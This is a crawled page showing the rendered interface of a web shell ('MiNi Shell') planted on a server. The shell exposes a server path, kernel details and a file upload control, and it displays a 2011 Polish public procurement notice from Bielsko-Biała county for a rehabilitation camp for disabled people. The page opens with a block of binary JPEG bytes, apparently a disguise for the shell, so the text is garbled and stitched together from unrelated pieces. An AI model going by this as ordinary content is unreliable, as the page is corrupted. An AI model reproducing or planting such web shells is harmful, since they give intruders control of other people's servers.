JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110520/123362-N-2011.html

<p class="kh_header"><b>Bielsko-Biała: Organizacja i przeprowadzenie turnusu rehabilitacyjnego usprawniająco - rekreacyjnego wraz z Treningiem kompetencji i umiejętności społecznych w ramach realizowanego projektu pt. Droga do aktywności - aktywizacja społeczna i zawodowa mieszkańców powiatu bielskiego, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.2 Program Operacyjny Kapitał Ludzki współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 123362 - 2011; data zamieszczenia: 20.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Bielski , ul. Piastowska 40, 43-300 Bielsko-Biała, woj. śląskie, tel. 033 8136800, faks 033 8220672.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.bielsko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie turnusu rehabilitacyjnego usprawniająco - rekreacyjnego wraz z Treningiem kompetencji i umiejętności społecznych w ramach realizowanego projektu pt. Droga do aktywności - aktywizacja społeczna i zawodowa mieszkańców powiatu bielskiego, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.2 Program Operacyjny Kapitał Ludzki współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)Przedmiotem zamówienia jest organizacja i przeprowadzenie jednego 14-dniowego turnusu rehabilitacyjnego usprawniająco - rekreacyjnego wraz z Treningiem kompetencji i umiejętności społecznych w ramach realizowanego projektu Droga do aktywności - aktywizacja społeczna i zawodowa mieszkańców powiatu bielskiego w ramach Priorytetu VII, Działanie 7.1, Poddziałanie 7.1.2 w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego dla niepełnosprawnych uczestników/uczestniczek projektu i ich opiekunów, nad morzem w okresie od 29 sierpnia 2011r. do 16 września 2011r. wraz z dowozem i przywozem powrotnym. 

Turnus rozpoczyna się obiadokolacją i kończy się śniadaniem w dniu wyjazdu. Organizator musi zapewnić wszystkim uczestnikom/uczestniczkom i ich opiekunom suchy prowiant na drogę powrotną. 

W turnusie biorą udział:

a)Uczestnicy/uczestniczki - 23 osób niepełnosprawnych z następującymi schorzeniami:
- z chorobami dermatologicznymi,
- z chorobami neurologicznymi,
- z chorobami układu moczowo-płciowego,
- z chorobami układu pokarmowego,
- z chorobą psychiczną,
- z cukrzycą,
- z dysfunkcją narządu ruchu, z wyłączeniem osób poruszających się na wózkach inwalidzkich,
- z dysfunkcją narządu ruchu poruszających się na wózkach inwalidzkich,
- z dysfunkcją narządu słuchu,
 - z dysfunkcją narządu wzroku,
 - ze schorzeniami dermatologicznymi,
- ze schorzeniami endokrynologicznymi,
- ze schorzeniami laryngologicznymi,
- ze schorzeniami onkologicznymi,
- ze schorzeniami układu krążenia,
 - ze schorzeniami układu oddechowego,
- z padaczką,
 - z upośledzeniem umysłowym.

b)Opiekunowie- 7 osób.

2)Zamówienie obejmuje:
a) Dojazd: Transport autokarowy uczestników z Bielska-Białej, ul. Piastowska 40 - siedziba Zamawiającego do miejscowości, w której położony jest ośrodek oraz przywóz uczestników/uczestniczek i ich opiekunów z ośrodka do Bielska-Białej, ul. Piastowska 40 - do siedziby Zamawiającego po zakończeniu turnusu. Zamawiający wymaga by transport odbywał się w pojazdach wyposażonych w klimatyzację, wc oraz system nagłośnienia, dostosowanym również do przewozu osób z dysfunkcją narządu ruchu poruszających się na wózkach inwalidzkich. Wykonawca zapewnia suchy prowiant na drogę powrotną.Pobyt na turnusie rehabilitacyjnym dla 30 osób w tym: 23 osób niepełnosprawnych w tym 1 poruszająca się na wózku inwalidzkim, 7 osób - opiekunów osób niepełnosprawnych. Ostateczna ilość osób może ulec zwiększeniu/zmniejszeniu nie więcej niż  o 4 osoby.
b)Zakwaterowanie wszystkich uczestników turnusu w jednym budynku, w pokojach 1, 2 osobowych z pełnym węzłem sanitarnym dostosowanym do potrzeb osób niepełnosprawnych (łazienka i toaleta), wraz z minimalnym wyposażeniem, takim jak: TV, ręczniki, czajnik bezprzewodowy, szklanki/inne naczynia, 1 litr wody mineralnej gazowanej/niegazowanej na 1 uczestnika dziennie.
c)Pełne wyżywienie (śniadanie, obiad, kolacja) w stołówce położonej na terenie ośrodka.
d)Bezpłatną całodobową opiekę medyczną (stała opieka lekarska i pielęgniarska).
e)Opłacenie przez Wykonawcę taksy klimatycznej za wszystkich uczestników turnusu.
f)Ubezpieczenie uczestników turnusu w ramach NNW w czasie od wyjazdu z Bielska-Białej - powrót do Bielska-Białej.
g)Zabiegi rehabilitacyjne dla wszystkich uczestników turnusu (2 zabiegi rehabilitacyjne dziennie wg zaleceń lekarza ośrodka na uczestnika pobytu, ustalone na podstawie informacji o stanie zdrowia wraz z dokumentacją medyczną lub pakiet zabiegów). 
h)Zapewnienie bezpłatnie bazy wypoczynkowo rekreacyjnej, w tym:
- infrastruktura sportowa (boiska do gier zespołowych, stół do tenisa stołowego, sala gimnastyczna) wraz z bezpłatną wypożyczalnią sprzętu sportowego znajdująca się na terenie ośrodka
-  inne rekreacje np.: kawiarnia, stół bilardowy, piłkarzyki, gry planszowe.
i)Zorganizowanie i przeprowadzenie Treningu kompetencji i umiejętności społecznych 
w dwóch grupach w wymiarze 16 godzin dla każdej z grup obejmujący, co najmniej poniższe zagadnienia:
- Poznanie samego siebie - konstruktywna samoocena i motywacja do podejmowania działań.
 - Pokonywanie oporów przed zmianą.
 - Konstruktywne wyrażanie emocji i radzenia sobie z nimi.
 - Umiejętności rozwiązywania i przezwyciężania konfliktów.
 - Asertywność w relacjach z innymi ludźmi.
- Nauka efektywnego odpoczywania  
Wykonawca zapewnia salę (na terenie Ośrodka) do prowadzenie zajęć Treningu kompetencji i umiejętności społecznych, wyposażoną w stoły, krzesła, tablicę, ekran projekcyjny. Uczestnicy/uczestniczki projektu otrzymują zaświadczenie/certyfikat o zakończeniu Treningu kompetencji i umiejętności społecznych oznakowane logo Europejskiego Funduszu Społecznego i Programu Operacyjnego Kapitał Ludzki, ponadto muszą zawierać informacje o współfinansowaniu materiału przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, zgodnie z dokumentem Wytyczne dotyczące oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki z dnia 4 lutego 2009r.
j)Zapewnienie uczestnikom pobytu obsługi kulturalno - oświatowej, programów integracji społecznej (ogniska z pieczeniem kiełbasek, grillowanie, zabawy taneczne, wieczorki przy muzyce na żywo, pogadanki prozdrowotne, wieczorki tematyczne wraz z poczęstunkiem odpowiednim do typu imprezy).
k)Zapewnienie uczestnikom pobytu:
 - identyfikacji uczestników turnusu poprzez indywidualny system identyfikacji paskowej,
- możliwości bezpłatnego skorzystania z pralni 1 raz w trakcie trwania turnusu dla każdego uczestnika.
m) Wykonawca zobowiązuje się do oznakowania miejsc, z których korzystać będą uczestnicy turnusu (pokoje, sala zajęciowa itp.) poprzez umieszczenie plakatów informacyjnych dotyczących projektu oraz współfinansowania przez Unię Europejską (dostarczonych przez Zamawiającego)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie w/w warunku, jeśli Wykonawca wykaże, że posiada  aktualny wpis do Rejestru Organizatorów Turnusów Rehabilitacyjnych dla osób niepełnosprawnych oraz aktualny wpis do Rejestru ośrodków, w których mogą odbywać się turnusy rehabilitacyjne dla osób niepełnosprawnych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy - Załącznik nr 1 do SIWZ;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art.144 ust.1 Ustawy Prawo Zamówień Publicznych Zamawiający przewiduje możliwość wprowadzenia istotnych zmian postanowień zawartej umowy w stosunku do treści przedłożonej w niniejszym postępowaniu oferty, na podstawie, której 
dokonano wyboru Wykonawcy w następujących przypadkach: 
a)przesunięcia terminu turnusu z przyczyn leżących po stronie Zamawiającego, 
a dotyczących uczestników turnusu - osób niepełnosprawnych,
b)zmniejszenia/zwiększenia ilości osób zakwalifikowanych na turnus</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.bielsko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Bielsku-Białej 43-300 Bielsko-Biała, ul. Piastowska 40, 
pok. 202, II piętro bud. A.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2011 godzina 10:45, miejsce: Starostwo Powiatowe w Bielsku-Białej 43-300 Bielsko-Biała, ul. Piastowska 40, 
pok. 202, II piętro bud. A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pt. Droga do aktywności - aktywizacja społeczna i zawodowa mieszkańców powiatu bielskiego, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.2 Program Operacyjny Kapitał Ludzki współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com